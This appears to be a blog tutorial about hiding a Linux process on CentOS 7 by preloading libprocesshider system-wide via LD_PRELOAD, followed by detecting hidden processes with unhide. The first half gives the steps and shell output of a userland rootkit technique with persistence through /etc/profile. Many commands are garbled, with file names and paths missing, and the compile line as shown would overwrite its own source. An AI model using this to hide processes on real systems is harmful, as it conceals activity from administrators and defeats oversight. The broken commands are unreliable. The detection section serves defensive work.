Creating and discovering hidden processes based on centos 7 Linux

1, Hide process

1. The tools used in this paper are Can be downloaded

2. The idea is to realize the hijacking of system functions by using LD ˊ preload

Ld_preload, an environment variable, is used to load dynamic libraries. The priority of dynamic library loading is the highest. Generally, the loading order is ld_preload > ld_library_path > / etc / > / lib > / usr / lib. In the program, we often call the functions of some external libraries. Take malloc as an example. If we have a custom malloc function, compile it into a dynamic library and load it through LD_PRELOAD, when we call malloc function in the program, we call the function in our own way.


[root@kangcw ~]# git clone
Cloning into 'libprocesshider'...
remote: Enumerating objects: 30, done.
remote: Total 30 (delta 0), reused 0 (delta 0), pack-reused 30
Unpacking objects: 100% (30/30), done.

[root@kangcw ~]# cd libprocesshider/
[root@kangcw libprocesshider]# ls  Makefile  processhider.c

#Modify the process name to hide
[root@kangcw libprocesshider]# vim processhider.c  #open
static const char* process_to_filter = "xianyu_cb";    ##Defined process name

[root@kangcw libprocesshider]# make
gcc -Wall -fPIC -shared -o processhider.c -ldl

//Move the file to / usr/local/lib /
[root@kangcw libprocesshider]# mv /usr/local/lib/

//Load it into the global dynamic connection Office

echo /usr/local/lib/ >> /etc/

//Or add / etc/profile
[root@kangcw libprocesshider]# cat /etc/profile |tail -n 1
export LD_PRELOAD=/usr/local/lib/


Before calling that module
//Start a process  
[root@kangcw libprocesshider]# ./xianyu_cb cb &
[1] 17131
[root@kangcw libprocesshider]# Waiting for the server to connect...
[root@kangcw libprocesshider]# ps -ef |grep xianyu
root     17131 17041  0 20:36 pts/2    00:00:00 ./xianyu_cb cb  #You can see the process
root     17149 17041  0 20:36 pts/2    00:00:00 grep --color=auto xianyu

//After opening
[root@kangcw libprocesshider]# vim /etc/profile
[root@kangcw libprocesshider]# source /etc/profile
[root@kangcw libprocesshider]# ./xianyu_cb cb&
[1] 17731
[root@kangcw libprocesshider]# Waiting for the server to connect...
[root@kangcw libprocesshider]# ps -ef|grep xianyu     #Implementing process hiding
root     17749 17411  0 20:38 pts/2    00:00:00 grep --color=auto xianyu
[root@kangcw libprocesshider]# 


  1. The program defines a variable process "to" filter to control which process name is not displayed
  2. Rewrite readdir,
    strcmp(process_name, process_to_filter) == 0)
    Continue the loop when the current process name is found to be the same as process "to" filter
  1. This program fails to compile in some Linux


    Delete one of the last two lines

    DECLARE_READDIR(dirent64, readdir64);

    DECLARE_READDIR(dirent, readdir);

  2. Some Linux uses

    echo /usr/local/lib/ >> /etc/

    It doesn't work
    At this point, we need to configure environment variables

    bmfxgkpt-yhd:~# vi /etc/profile

    Add a row

    export LD_PRELOAD=/usr/local/lib/

2, How to discover hidden processes

unhide is a small network forensics tool, which can find processes and TCP / UDP ports hidden by rootkit, LKM and other technologies. This tool can work under Linux, UNIX class, MS-Windows and other operating systems.


[root@kangcw ~]# yum install unhide
Loaded plugins: fastestmirror, langpacks, priorities
Repository epel is listed more than once in the configuration
Loading mirror speeds from cached hostfile
 * centos-sclo-rh:
 * centos-sclo-sclo:
 * remi-safe:
centos-sclo-rh                                                                                                                                                        | 3.0 kB  00:00:00     
centos-sclo-sclo                                                                                                                                                      | 2.9 kB  00:00:00     
epel                                                                                                                                                                  | 5.3 kB  00:00:00     
extras                                                                                                                                                                | 2.9 kB  00:00:00     
google-chrome                                                                                                                                                         | 1.3 kB  00:00:00     
mysql-connectors-community                                                                                                                                            | 2.5 kB  00:00:00     
mysql-tools-community                                                                                                                                                 | 2.5 kB  00:00:00     
mysql57-community                                                                                                                                                     | 2.5 kB  00:00:00     
os                                                                                                                                                                    | 3.6 kB  00:00:00     
remi-safe                                                                                                                                                             | 3.0 kB  00:00:00     
teamviewer                                                                                                                                                            | 2.5 kB  00:00:00     
updates                                                                                                                                                               | 2.9 kB  00:00:00     
remi-safe/primary_db                                                                                                                                                  | 1.7 MB  00:02:53     
Resolving Dependencies
--> Running transaction check
---> Package unhide.x86_64 0:20130526-1.el7 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

 Package                                     Arch                                        Version                                             Repository                                 Size
 unhide                                      x86_64                                      20130526-1.el7                                      epel                                       63 k

Transaction Summary
Install  1 Package

Total download size: 63 k
Installed size: 146 k
Is this ok [y/d/N]: y
Downloading packages:
unhide-20130526-1.el7.x86_64.rpm                                                                                                                                      |  63 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : unhide-20130526-1.el7.x86_64                                                                                                                                              1/1 
  Verifying  : unhide-20130526-1.el7.x86_64                                                                                                                                              1/1 

  unhide.x86_64 0:20130526-1.el7                                                                                                                                                             



Use unhide proc to discover the hidden process, as shown in the following figure:

Tags: Operation & Maintenance CentOS Linux EPEL github

Posted on Mon, 23 Mar 2020 10:13:26 -0400 by dickey